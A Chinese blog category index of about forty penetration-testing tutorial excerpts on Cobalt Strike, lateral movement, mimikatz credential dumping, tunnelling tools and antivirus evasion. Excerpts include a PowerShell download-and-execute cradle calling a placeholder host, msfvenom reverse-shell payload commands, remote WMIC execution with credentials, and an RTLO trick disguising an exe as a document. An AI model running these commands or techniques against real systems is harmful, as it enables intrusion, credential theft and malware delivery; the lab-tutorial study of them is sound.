渗透测试
文章平均质量分 73
AA8j
Who Am I-Kein System ist sicher
展开
-
【渗透测试笔记】之【内网渗透——CS流量隐蔽】
文章目录1. 端口特征2. 证书特征2. 配置CDN3. 生成自定义配置文件4. 效果演示1. 端口特征vim teamserver将默认端口修改:-Dcobaltstrike.server_port=644442. 证书特征删除原有证书(第一次启动会生成cobaltstrike.store),创建新证书cobaltstrike.storerm cobaltstrike.storekeytool -keystore cobaltstrike.store -storepass 12345原创 2021-11-22 15:49:18 · 4725 阅读 · 1 评论 -
【渗透测试笔记】之【内网渗透——横向移动:WMI的使用】
文章目录1. 自带WMIC2. Invoke-WmiCommand.ps13. Invoke-WMIMethod.ps14. wmiexec.vbs5. wmiexec.py1. 自带WMIC特点:不会产生日志记录没有回显,若要查看命令结果需要配合IPC$与type命令wmic /node:10.1.1.2 /user:administrator /password:1234567.com process call create "cmd.exe /c ipconfig >c:\ip.t原创 2021-11-18 11:18:12 · 4458 阅读 · 0 评论 -
【渗透测试笔记】之【内网渗透——横向移动:PsExec的使用】
文章目录1. PsTools工具包中的PsExec1.1 注意事项1.2 使用方法1.2.1 获得交互式shell1.2.2 执行单条命令并回显2. CS中的PsExec2.1 查看目标所在网段其它主机2.2 使用PsExec横向移动3. msf中的PsExec3.1 添加路由3.2 加载模块,设置目标IP、账号、密码及设置payload1. PsTools工具包中的PsExec地址:https://download.sysinternals.com/files/PSTools.zip1.1 注意事项原创 2021-11-18 10:50:04 · 8225 阅读 · 0 评论 -
【渗透测试笔记】之【内网渗透——横向移动:使用mimikatz和CS进行哈希传递攻击】
文章目录1. mimikatz1.1 NTLM Hash传递攻击1.2 AES-256 哈希传递攻击2. CS2.1 获得一个Beacon2.2 dump Hash2.2.1 方法一2.2.2 方法二2.2.3 查看2.3 哈希传递攻击1. mimikatz地址:https://github.com/gentilkiwi/mimikatz1.1 NTLM Hash传递攻击首先获得域管NTLM Hash:【渗透测试笔记】之【内网渗透——横向移动:获取Windows明文密码与散列值的若干方法和防御手段原创 2021-11-15 14:18:18 · 3720 阅读 · 0 评论 -
【渗透测试笔记】之【内网渗透——横向移动:获取Windows明文密码与散列值的若干方法和防御手段】
文章目录1. Hash结构2. 获取方法2.1 mimikatz2.1.1 在线读取散列值和明文密码2.1.2 在线读取SAM文件,获取散列值2.1.3 离线读取lsass.dmp 文件,获取明文与散列值1. 导出lsass.dmp 文件2. 读取lsass.dmp 文件2.1.4 离线读取SAM和system文件,获取散列值1. 导出2. 读取2.1.5 使用PowerShell版mimikatz获取明文密码与散列值2.2 GetPassword(获得明文密码及散列值)2.3 PwDump7(获得散列值)原创 2021-11-14 13:43:34 · 3086 阅读 · 0 评论 -
【渗透测试笔记】之【内网渗透——应用层隧道(EarthWorm的使用:各种复杂内网(一二三级网络)环境中的socks代理方法))】
下载地址https://github.com/AA8j/SecTools/tree/main/ew1. 普通网络在普通网络环境下,可直接通过跳板机访问内网特定资源。1.1 跳板机存在公网IP1.1.1 网络环境目标主机(公网IP:1.1.1.1,可访问特定内网资源)(跳板机)1.1.2 使用方法目标主机(公网IP:1.1.1.1,可访问特定内网资源):ew -s ssocksd -l 8888侦听本机的8888端口,提供socks代理1.1.3 流量走向本地主机--->1.原创 2021-10-27 16:06:11 · 1129 阅读 · 0 评论 -
【渗透测试笔记】之【内网渗透——应用层隧道(DNS隧道:dnscat2的使用(域名连接、直连、powershell连接))】
文章目录1 服务器端环境部署1.1 部署域名解析1.1.1 创建A记录1.1.2 创建NS记录1.2 安装dnscat2服务器1.3 启动服务器1.3.1 域名连接方式1.3.2 直连方式2 客户端部署2.1 安装dnscat2客户端2.2 连接服务器2.2.1 访问测试及错误处理2.2.2 域名连接方式2.2.3 直连方式2.3 服务端常用命令2.3.1 获取一个shell2.3.2 打开一个程序1 服务器端环境部署1.1 部署域名解析如果要通过域名的方式访问那么久必须部署域名解析,直连方式则跳过此原创 2021-10-26 15:41:18 · 2466 阅读 · 0 评论 -
【渗透测试笔记】之【内网渗透——CS权限维持:CS上线后进程自迁移插件】
1. 服务端加载malleable配置文件1.1 下载下载地址:https://github.com/threatexpress/malleable-c2下载cs对应版本配置文件:我这里下载4.3版本的。1.2 加载配置文件下载完后放入CS根目录:加载配置文件启动方式,只需要在末尾跟上配置文件就可以了:./teamserver 192.168.8.48 aa8j jquery-c2.4.3.profile2. 客户端加载cna插件2.1 插件下载下载地址:https://git原创 2021-10-25 18:35:31 · 2996 阅读 · 2 评论 -
【渗透测试笔记】之【Python免杀——两行代码免杀。VT查杀率:10/68(思路:将ShellCode和Loader一起分离免杀)】
文章目录1. shellcode Loader1.1 生成shellcode1.2 shellcode loader 脚本上线测试1.3 使用pyinstaller生成exe文件上线测试1.4 VT查杀率:24/682. ShellCode 分离2.1 上传加密后的shellcode2.2 改写shellcode loader2.3 shellcode 分离后shellcode loader脚本上线测试2.4 shellcode 分离后,使用pyinstaller生成exe文件上线测试2.5 VT查杀率:1原创 2021-10-24 19:59:18 · 5946 阅读 · 1 评论 -
【渗透测试笔记】之【内网渗透——应用层隧道(reGeorg的使用:HTTP(S)隧道下的内网代理)】
1 实验环境kali(攻击机,外网地址:192.168.8.48)Windows2012(边界服务器,外网地址:192.168.8.57,内网地址:10.1.1.10)CentOS7(边界服务器,外网地址:192.168.8.35,内网地址:10.1.1.13)DC(内网地址:10.1.1.2)2 下载下载地址:https://github.com/sensepost/reGeorg3 使用方法此处只对php和aspx做演示,其他环境同理不做赘述。3.1 PHP3.1.1 边界服务器原创 2021-10-24 13:27:26 · 4275 阅读 · 0 评论 -
【渗透测试笔记】之【内网渗透——应用层隧道(SSH隧道的使用:本地、远程端口转发,动态转发(内网socks代理))】
写在前面:几乎所有Linux系统都支持且默认装有SSH,在windows上可以使用Xshell等工具去连接。文章目录1 实验环境2 使用方法2.1 常用参数2.2 本地端口转发2.2.1 攻击机2.2.2 效果演示2.3 远程端口转发2.3.1 边界服务器(CentOS7)2.3.2 效果演示2.4 动态转发(内网代理)2.4.1 攻击机2.4.2 效果演示1. 通过proxychains代理访问内网:2. 浏览器通过代理访问内网:3. goby通过代理扫描内网:1 实验环境kali(攻击机,外网地址原创 2021-10-23 14:21:23 · 922 阅读 · 0 评论 -
【渗透测试笔记】之【内网渗透——传输层隧道(PowerCat的使用:正反向shell、文件传输、dns隧道、生成powershell payload、内网转发)】
写在前面:PowerCat是PowerShell版本的nc,主要用于windows平台。1 实验环境kali(攻击机,外网地址:192.168.8.48)Windows2012(边界服务器,外网地址:192.168.8.57,内网地址:10.1.1.10)CentOS7(边界服务器,外网地址:192.168.8.35,内网地址:10.1.1.13)DC(内网地址:10.1.1.2)2 下载与部署2.1 下载下载地址:https://github.com/besimorhino/powerc原创 2021-10-22 14:25:11 · 983 阅读 · 0 评论 -
【渗透测试笔记】之【内网渗透——传输层隧道(nc的使用:nc的正反向shell、bash、python、php、java的反向shell、内网转发)】
文章目录实验环境1 下载与部署2 使用方法2.1 正向shell2.2 反向shell实验环境kali(攻击机,外网地址:192.168.8.48)Windows2012(边界服务器,外网地址:192.168.8.56,内网地址:10.1.1.10)CentOS7(边界服务器,外网地址:192.168.8.35,内网地址:10.1.1.13)Windows2012(DC,内网地址:10.1.1.2)1 下载与部署下载地址:https://github.com/AA8j/SecTools/tre原创 2021-10-21 17:35:10 · 1504 阅读 · 0 评论 -
【渗透测试笔记】之【内网渗透——传输层隧道(lcx(portmap)的使用:边界服务器分别为Windows和Linux下本地端口映射、转发)】
文章目录1. lcx1.1 下载与部署1.2 使用方法1.2.1 内网端口转发2. netcat2.1 下载与部署kali2.2 使用方法kali2.3 效果演示3. PowerCat3.1 下载与部署kali3.2 使用方法kali3.3 效果演示1. lcx实验环境:kali(攻击机,外网地址:192.168.8.48)Windows2012(边界服务器,外网地址:192.168.8.56,内网地址:10.1.1.10)CentOS7(边界服务器,外网地址:192.168.8.13,内网地址:原创 2021-10-16 15:30:14 · 2018 阅读 · 0 评论 -
【渗透测试笔记】之【内网渗透——网络层隧道(icmpsh、PingTunnel的使用:icmp隧道反向shell、本地端口转发)】
拓扑图ICMP隧道条件:能ping通主机。原创 2021-10-14 13:55:04 · 642 阅读 · 0 评论 -
【渗透测试笔记】之【内网渗透——域渗透信息收集神器BloodHound安装方法】
0x01 环境搭建与安装Java环境Neo4j数据库环境BloodHound的运行1. Java环境与Neo4j的安装首先打开Neo4j社区版的下载地址:https://neo4j.com/download-center/#community选择对应版本,这里选择Linux版:安装对应JDK版本,否则会报错启动Neo4j:cd /root/Desktop/BloodHound&neo4j/neo4j-community-4.3.5/bin && ./neo原创 2021-10-08 11:08:52 · 916 阅读 · 0 评论 -
【渗透测试笔记】之【内网渗透——彻底理解Kerberos认证和黄金白银票据】
KerberosKerberos 是一种网络认证协议,其设计目标是通过密钥系统为客户机/服务器应用程序提供强大的认证服务。该认证过程的实现不依赖于主机操作系统的认证,无需基于主机地址的信任,不要求网络上所有主机的物理安全,并假定网络上传送的数据包可以被任意地读取、修改和插入数据。在以上情况下,Kerberos 作为一种可信任的第三方认证服务,是通过传统的密码技术(如:共享密钥)执行认证服务的。参与角色ClientServerKDC(Key Distribution Center):A原创 2021-08-07 09:50:54 · 1094 阅读 · 0 评论 -
【渗透测试笔记】之【内网渗透——彻底理解NTLM 网络认证和哈希传递攻击】
目录文章目录目录原创 2021-08-03 21:38:21 · 362 阅读 · 0 评论 -
【渗透测试笔记】之【内网渗透——横向渗透(1)登录认证】
目录文章目录目录拓扑图制作token散列认证IPC 连接拓扑图制作token因为后续所需要进行的是内网渗透,这时候我们可以创建一个SMB的监听器,因为链接的Beacons 使用Windows 命名管道进行通信,此流量封装在SMB协议中,所以SMB Beacon相对隐蔽,绕防火墙时可能发挥奇效。方法1:偷取token到进程中偷取token:右键要横向的主机,选择psexec64:选择一个已经获得的凭据或者勾选使用当前令牌,并选择监听器与会话即可:方法2:制作toke原创 2021-08-03 09:30:19 · 551 阅读 · 0 评论 -
【渗透测试笔记】之【内网渗透——Windows系统散列值获取与防范】
拓扑图Windows系统散列值获取与防范1.通过CS模块获取用户凭证信息在获取到目标主机权限后,我们可以抓取hash和dump明文密码,这两项功能都需要管理员权限,如果权限不足,先要进行提权操作。抓取密码哈希:右键被控主机 —> Access —> Dump Hashes[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-iBCl8Ihj-1627176965164)(images/2021-07-20-16-09-45.png)][外链图片转存失败,原创 2021-07-26 16:08:49 · 504 阅读 · 0 评论 -
【渗透测试笔记】之【钓鱼姿势——exe捆绑与免杀】
准备被捆绑程序:输入:msfvenom -p windows/meterpreter/reverse_http lhost=x.x.x.x lport=55555 -e x86/shikata_ga_nai -i 15 -f exe -b '\x00\x0a\x0d' -x ~/Desktop/inst.exe > ~/Desktop/Trojan/test_msf_360.exe目标主机执行,成功上线:...原创 2021-07-06 17:57:39 · 5836 阅读 · 0 评论 -
【渗透测试笔记】之【免杀工具——使用Invoke-Obfuscation代码混淆免杀powershell】
0x01 项目地址https://github.com/danielbohannon/Invoke-Obfuscation0x02 用法生成powershell:powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x:55556/a'))"下载并用powershell进入项目目录执行:Import-Module .\Invoke-Obfuscati原创 2021-07-06 17:30:27 · 2086 阅读 · 0 评论 -
【渗透测试笔记】之【钓鱼姿势——exe伪装word文档(exe图标修改方法)】
文件后缀倒序+图标伪装加入icon图标:提取icon图标工具:BeCyIconGrabber加入icon图标工具:Restorator 2018首先将exe拖入:右键添加资源:选择 图标,名称随便写:拖入icon:另存:重命名py脚本:import os os.rename('shellcode.exe', 'x\u202excod.exe')效果:...原创 2021-07-06 11:47:04 · 5415 阅读 · 0 评论 -
【渗透测试笔记】之【免杀工具——msfvenom+FourEye】
利用msfvenom生成shellcode:msfvenom -p windows/meterpreter/reverse_http lhost=x.x.x.x lport=44444 -e x86/shikata_ga_nai -i 10 -f raw -b '\x00\x0a\x0d' > ~/Desktop/Trojan/test.bin利用FourEye生成exe:FourEye >>shellcodeFourEye(shellcode) >>1F.原创 2021-07-06 08:46:32 · 513 阅读 · 0 评论 -
【渗透测试笔记】之【Cobalt Strike小技巧——后台挂起CS服务端】
每次断开vps ssh CS服务器就会关闭。如何解决?解决办法:screenapt install screen -y:下载screen:命令screen:启动,输入任意键就会进入另一个终端:在这个终端启动CS服务端:键入Ctrl+a+d退出screen的终端,来到实际终端,键入screen -ls查看后台终端会话:断开vps ssh连接,连接CS服务端:成功连接:重新连接ssh,命令screen -r 825重新进入screen终端:此处简单介绍原创 2021-07-03 18:20:03 · 2431 阅读 · 0 评论 -
【渗透测试笔记】之【内网渗透——Cobalt Strike信息收集】
拓扑图1.判断是否存在域shell net view /domainipconfig /allsysteminfonet config workstation以上足以判断就不一一举例了。探测域内存活主机及端口arp扫描portscan null-255.255.255.255 0 arp 1024原创 2021-07-02 16:58:58 · 1545 阅读 · 0 评论 -
【渗透测试笔记】之【域渗透环境搭建(补充)——搭建m0n0wall防火墙实现NAT】
使用m0n0wall代替CentOS做NAT转换,m0n0wall是基于FreeBSD内核开发的免费软件防火墙。m0n0wall提供基于Web的配置管理、支持DHCP Server、DNS转发、动态DNS、IPSec、流量控制、无线网络的支持。其麻雀虽小五脏俱全。拓扑图搭建过程vmware配置下载(提取码:aa8j )m0n0wall的iso文件并配置:开机后选择7安装到硬盘,输入硬盘名,输入y:输入1设置端口,输入n不设置VLAN查看LAN区段网卡所对应的MAC地址,原创 2021-06-30 19:14:53 · 696 阅读 · 1 评论 -
【渗透测试笔记】之【内网渗透——Cobalt Strike会话管理(与MSF联动)】
会话管理1.CS会话派生到CS首先新建一个监听器用于监听派生的会话右键要派生的会话点击spawn然后选择派生到刚刚新建的监听器上,点击choose即可。也可以先连接其它cs服务器新建监听器,将会话派生到其它cs服务器上2.CS会话派生到MSF开启MSF监听:在CS上创建监听器并指向MSF监听的地址:通过Spawn将已有会话派生到新创建的监听器中:可以看到会话成功派生到了MSF上:3.MSF派生CS会话1.生成木马直接回连到CSCS新建原创 2021-06-29 20:18:11 · 314 阅读 · 1 评论 -
【渗透测试笔记】之【内网渗透——Cobalt Strike用户驱动攻击】
拓扑图功能介绍常见的用户驱动攻击的模块如下:屏幕截图、键盘记录、进程处理、端口扫描、用户发现、文件管理、远程vnc、浏览器代理(仅针对ie浏览器)等。修改回连时间为1s其响应更快(默认60s):1.浏览器代理(仅对IE有效)该模块用于对目标靶机上的ie浏览器进行代理攻击。选择Browser Privot选择ie浏览器此时通过本地的26536端口代理,即可冒充目标主机浏览器去访问网站。browserpivot stop 关闭浏览器代理。2.远程VNC原创 2021-06-28 19:49:25 · 382 阅读 · 1 评论 -
【渗透测试笔记】之【内网渗透——初探Cobalt Strike】
拓扑图CS文件说明文件名解释agscript展应用的脚本。c2lint用于检查profile 的错误和异常。teamserver团队服务器程序。cobaltstrike 和 cobaltstrike.jar客户端程序。因为teamserver文件是通过Java来调用CobaltStrike 的,所以直接在命令行环境中输入第一个文件的内容也能启动Cobalt Strike 客户端 (主要是为了方便操作)。logs日志,包括 Web日志、Beacon原创 2021-06-28 17:05:40 · 278 阅读 · 1 评论 -
【渗透测试笔记】之【域渗透环境搭建(下)——搭建域环境】
拓扑图详细步骤1. 创建DC修改计算机名,如DC-1(升级为域控后无法修改):上一节已经将IP地址设置为静态,DNS服务器指向了自己,不再赘述。【渗透测试笔记】之【域渗透环境搭建(上)——搭建内外网环境(利用firewalld实现NAT)】安装活动目录ADwin+R键输入dcpromo,即可开始安装:在新林中新建域,域名随便起一个如aa8j.com:林(域)功能级别,注意如果还要添加另一个域控,其版本不得低于此选项,这里就默认吧:添加DNS服务器:选择是输入还原密码:原创 2021-06-27 10:51:41 · 357 阅读 · 1 评论 -
【渗透测试笔记】之【域渗透环境搭建(上)——搭建内外网环境(利用firewalld实现NAT)】
拓扑图详细步骤1. 添加网卡与配置网络添加一块网卡,网卡1为NAT模式,模拟外网;网卡2为LA区段,模拟内网。查看网卡信息:可以看到处于NAT的网卡一ens33自动获取了ip192.168.8.35,网卡二ens37没有ip。将网卡一和网卡二的ip都改为拓扑图对应的静态IP:重启网卡,发现ip已经更改:2. 利用firewalld实现NAT转发开启firewalld并设置开机自启:systemctl start firewalldsystemctl enable fi原创 2021-06-27 09:41:21 · 677 阅读 · 1 评论 -
【渗透测试笔记】之【将本地beef侦听的端口远程端口转发到云服务器】
1. 首先配置vps的ssh,允许外部访问vps端口:vi /etc/ssh/sshd_config将#GatewayPorts no改为:GatewayPorts yes2. vps添加防火墙规则,运行外网访问7000端口,并重启vps:3. 在kali上进行远程端口转发,将本地beef侦听的3000转发到vps的7000端口上:ssh -CfNg -R 7000:127.0.0.1:3000 root@1.2.3.4CfNg参数作用是压缩带宽,后台并发连接。末尾跟vpsIP原创 2020-12-27 17:25:56 · 519 阅读 · 0 评论 -
【渗透测试笔记】之【Windows与Linux常用】
Windows相关重要目录密码文件C:\Windows\System32\config\SAM本地域名解析C:\Windows\System32\drivers\etc\hosts.dz常见服务Web服务dns服务dhcp服务邮件服务telnet服务ssh服务ftp服务smb服务常见端口端口号作用80/8080/3128/8081/9080HTTP443HTTPS21FTP23Telnet69/UDPTFTP原创 2020-12-07 13:57:13 · 657 阅读 · 0 评论 -
【用python自动注入“sql手工注入靶场”】
踩点原创 2020-12-07 11:37:07 · 576 阅读 · 0 评论 -
【渗透测试笔记】之【recon-ng】
RECON-NG启动recon-ng设置默认选项(默认工作区,创建其它工作区将会依据默认工作区创建配置):options list设置DNS服务器options set NAMESERVER 114.114.114.114设置代理:options set PROXY 127.0.0.1:8889设置User-Agent:options set USER-AGENT Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.原创 2020-11-28 15:50:02 · 527 阅读 · 0 评论 -
【渗透测试笔记】之【MSF 弱点扫描】
弱点扫描HTTP常见弱点查看证书是否过期msf5 > use auxiliary/scanner/http/cert显示目录及文件目录msf5 > use auxiliary/scanner/http/dir_listing文件爆破msf5 auxiliary(scanner/http/dir_listing) > use auxiliary/scanner/http/files_dirmsf5 auxiliary(scanner/http/files_dir) &原创 2020-11-19 12:28:15 · 488 阅读 · 0 评论 -
【渗透测试笔记】之【MSF 信息搜集】
Nmapmsf5 > db_nmap -sV 192.168.172.130[*] Nmap: Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-07 16:20 CST[*] Nmap: Nmap scan report for 192.168.172.130[*] Nmap: Host is up (0.0011s latency).[*] Nmap: Not shown: 997 closed ports[*] Nmap: POR原创 2020-11-11 14:20:25 · 1414 阅读 · 0 评论 -
【渗透测试笔记】之【MSF Meterpreter Payload】
Meterpreter高级、动态、可扩展的payload。完全基于内存的DLL注入式payload(不写硬盘)。将自身注入系统进程并建立stager。基于stager上传和预加载DLL进行扩展模块的注入(客户端API)。基于stager建立的socket基础上再建立加密的TLS/1.0通信隧道。利用TLS隧道进一步加载后续扩展模块。(避免网络取证)服务器使用C语言编写。客户端提供基于Ruby的全特性API(支持任何语言)。...原创 2020-11-07 16:08:22 · 601 阅读 · 0 评论 -
【渗透测试笔记】之【MSF 生成payload】
生成payload# 查看所有payloadsshow payloads# 查看windows可用(输完按两下回车)use payload/windows/# 使用绑定端口payloadmsf5 > use payload/windows/shell_bind_tcp# 查看payload编码,里面可能含有“坏字符”msf5 payload(windows/shell_bind_tcp) > generate# 对坏字符编码(默认自动选择一个最合适的encoder,也可以手动指原创 2020-11-07 10:43:38 · 777 阅读 · 0 评论